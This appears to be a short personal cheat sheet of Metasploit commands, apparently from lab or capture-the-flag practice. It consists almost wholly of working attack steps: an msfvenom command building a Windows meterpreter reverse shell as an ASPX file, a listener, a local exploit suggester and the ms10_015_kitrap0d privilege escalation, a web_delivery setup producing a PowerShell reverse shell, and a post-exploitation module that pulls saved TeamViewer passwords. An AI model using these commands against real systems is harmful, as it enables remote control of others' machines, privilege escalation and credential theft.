msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

Post Exploitation with metasploit:

it will suggest some exploits:

use post/multi/recon/local_exploit_suggester
set session 1
run

Run one of the suggested exploit
use exploit/windows/local/ms10_015_kitrap0d
set session 1
run

*****************************************************************************************************************************

Generate Windows reverse shell (it will Powershell reverse shell command)

use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.52
set srvhost 10.10.14.52
exploit

Once get the session opened message run:

sessions 1

***************************************************************************************************************************

Following is the post exploit metsaploit command (Teamviewr Exploit):

use post/windows/gather/credentials/teamviewer_passwords
set session 1
exploit

***************************************************************************************************************************
